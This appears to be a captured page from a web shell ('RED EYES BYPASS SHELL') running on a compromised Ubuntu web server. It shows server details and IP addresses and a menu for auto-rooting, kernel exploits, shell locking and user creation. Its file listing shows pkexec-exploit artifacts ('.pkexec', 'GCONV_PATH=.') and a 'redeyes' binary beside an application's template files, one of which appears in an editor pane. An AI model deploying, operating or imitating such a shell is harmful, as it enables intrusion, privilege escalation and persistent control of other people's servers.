Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
user /
app /
template /
common /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
footer.html
986
B
-rw-r--r--
footerCommon.html
1.68
KB
-rw-r--r--
header.html
2.19
KB
-rw-r--r--
navbar.html
5.39
KB
-rw-r--r--
navbarShare.html
2.73
KB
-rw-r--r--
redeyes
10.99
KB
-rwxr-xr-x
showTips.html
3.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : showTips.html
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <link href="<?php echo STATIC_PATH;?>style/common.css?ver=<?php echo KOD_VERSION;?>" rel="stylesheet"/> <link href="./static/style/font-awesome/css/font-awesome.css?ver=<?php echo KOD_VERSION;?>" rel="stylesheet"> <title><?php echo $title;?></title> <script type="text/javascript" src="<?php echo STATIC_PATH;?>js/lib/jquery-1.8.0.min.js?ver=<?php echo KOD_VERSION;?>"></script> <style type="text/css"> body{ background-color:#f0f2f5; font-family: Verdana,"Lantinghei SC","Hiragino Sans GB","Microsoft Yahei",Helvetica,arial,sans-serif; line-height: 1.5em; } body a,body a:hover{color: #1890ff;} .body-panel{ width:70%;margin:10% auto 5% auto; font-size: 13px; color:#666; background:#fff;border-radius:4px; padding-top:50px;padding-bottom:100px; box-shadow: 0 5px 20px rgba(0,0,0,0.05); } .body-panel .check-result{text-align: center;color:#000;} .body-panel .check-result .icon{width:70px;height:70px;line-height:70px;font-size:30px;} .check-result-title{font-size: 24px;line-height: 32px;margin:20px 0;} .check-result-desc{ color: #333; margin: 0 0 20px 0; background: #fafafa; font-size: 16px; width: 80%; margin: 0 auto; border-radius: 2px; padding: 24px 40px; text-align: left; } .error-info{ border-left: 5px solid #1890ff; display: block; padding: 5px 10px; background: #fcfcfc; color: #666; word-break: break-all; font-family: monospace; } .location-to{padding: 10px 0;color: #888;font-size: 13px;font-style: italic;} .icon{ font-family: FontAwesome; display: inline-block; width: 20px; height: 20px; background: rgba(0, 0, 0, 0.02); text-align: center; color: #666; border-radius: 50%; line-height: 20px; font-size: 12px; } .icon.icon-loading{ -webkit-animation: moveCircleLoopRight 1.4s infinite linear; animation: moveCircleLoopRight 1.4s infinite linear; } .icon.icon-loading:before{content:"\f110";} .icon.icon-success{background:#52c41a;color:#fff;} .icon.icon-success:before{content:"\f00c";} .icon.icon-error{background:#f5222d;color:#fff;} .icon.icon-error:before{content:"\f00d";} </style> </head> <body> <div class="body-panel"> <div class="check-result"> <!-- <div class="icon icon-error"></div> --> <div class="check-result-title"><?php echo $title;?></div> <div class="check-result-desc"> <span class="error-info"><?php echo $message;?></span> <div class="location-to"><?php echo $info;?></div> </div> </div> </div> <?php if($url){ ?> <script> var timeout = parseInt("<?php echo $time;?>"); var link = "<?php echo $url;?>"; var loop = setInterval(function(){ timeout --; var info = timeout + "s 后自动跳转, <a href='"+link+"'>立即跳转</a>"; $('.location-to').html(info); if(timeout<=0){ clearInterval(loop); window.location.href = link; } },1000); </script> <?php } ?> </body> </html>
Close